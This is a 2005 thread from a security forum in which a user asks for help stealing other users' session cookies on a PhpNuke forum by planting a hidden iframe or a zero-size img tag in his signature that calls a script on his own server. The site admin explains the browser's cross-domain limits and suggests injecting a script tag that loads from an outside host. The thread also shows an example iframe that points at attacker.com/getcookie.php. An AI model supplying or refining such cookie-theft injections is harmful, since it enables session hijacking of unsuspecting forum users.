Waraxe IT Security Portal
Login or Register
November 24, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 82
Members: 0
Total: 82
Full disclosure
APPLE-SA-11-19-2024-5 macOS Sequoia 15.1.1
Local Privilege Escalations in needrestart
APPLE-SA-11-19-2024-4 iOS 17.7.2 and iPadOS 17.7.2
APPLE-SA-11-19-2024-3 iOS 18.1.1 and iPadOS 18.1.1
APPLE-SA-11-19-2024-2 visionOS 2.1.1
APPLE-SA-11-19-2024-1 Safari 18.1.1
Reflected XSS - fronsetiav1.1
XXE OOB - fronsetiav1.1
St. Poelten UAS | Path Traversal in Korenix JetPort 5601
St. Poelten UAS | Multiple Stored Cross-Site Scripting in SEH utnserver Pro
Apple web content filter bypass allows unrestricted access to blocked content (macOS/iOS/iPadOS/visionO S/watchOS)
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> problem in stealing cookies with iframe - please help!
Post new topicReply to topic View previous topic :: View next topic
problem in stealing cookies with iframe - please help!
PostPosted: Wed Jul 13, 2005 11:56 am Reply with quote
eli5050
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4




I built a script that takes all the cookies and saves them, and I hosted that script on my server.
here is the code:

edit: I deleted the code because it is not important to the answer



now, I entered some PHPIB forum (with php-nuke), and I found that html can be written in the signature, so I made an Iframe (0*0 Very Happy ) in my forum signature to the evil script. (by the way - javascript code is not working in the signature)

the problem is, that when the script ran he did not take the phpnuke with phpib site cookies, but it stole cookies from my server (beacause the script hosted in it).

can anyone help and find a solution that will solve the problem and make the script take the cookies from the site with the iframe and not from my site??


Last edited by eli5050 on Wed Jul 13, 2005 5:50 pm; edited 1 time in total
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 12:34 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




This is result of webbrowser security measures against cross-site and/or cross-domain scripting.
If you have iframe inside some webpage, then IF that iframe is hosted on other domain - you cant access parent page html code and other stuff, like cookies.
But if you can inject to target page html code something like this:

<script type=text/javascript src=xxx.com></script>

... then this javasript can do anything you want and browser will not apply any restrictions.
View user's profile Send private message Send e-mail Visit poster's website
thanks!
PostPosted: Wed Jul 13, 2005 12:41 pm Reply with quote
eli5050
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4




but the script code is in php, do you think it will work?
View user's profile Send private message
PostPosted: Wed Jul 13, 2005 12:46 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




As i can understand, you have something like:

Code:

<html>
<body>
...
....

<iframe src=http://attacker.com/getcookie.php></iframe>
...
...
</body>
</html>


All the stuff inside that iframe will be restricted by cross-domain security barriers.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Wed Jul 13, 2005 1:31 pm Reply with quote
eli5050
Beginner
Beginner
Joined: Jul 13, 2005
Posts: 4




I already told you I cant use scripts in my signature, if I write <script> then users see it as usual word and it is not with code. so I tried the following thing, instead "script I tried "img":

Code:
<img width = "0" height = "0" type="text/javascript" src="http://mysite/1.php"/>


and when I entered to a message that I wrote, my signature ran the script - but...

the cookie that was sent was from the server that stores the script and not the server I want...

where did I wrong?
could you please tell me or find some othe way to run the script?
View user's profile Send private message
problem in stealing cookies with iframe - please help!
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.044 Seconds